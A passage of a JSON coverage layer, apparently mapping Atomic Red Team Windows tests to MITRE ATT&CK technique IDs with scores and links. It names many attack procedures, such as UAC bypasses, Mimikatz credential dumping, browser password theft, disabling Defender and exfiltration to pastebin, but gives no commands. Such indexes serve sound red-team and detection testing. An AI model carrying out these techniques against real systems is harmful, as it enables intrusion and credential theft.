Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":57,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View 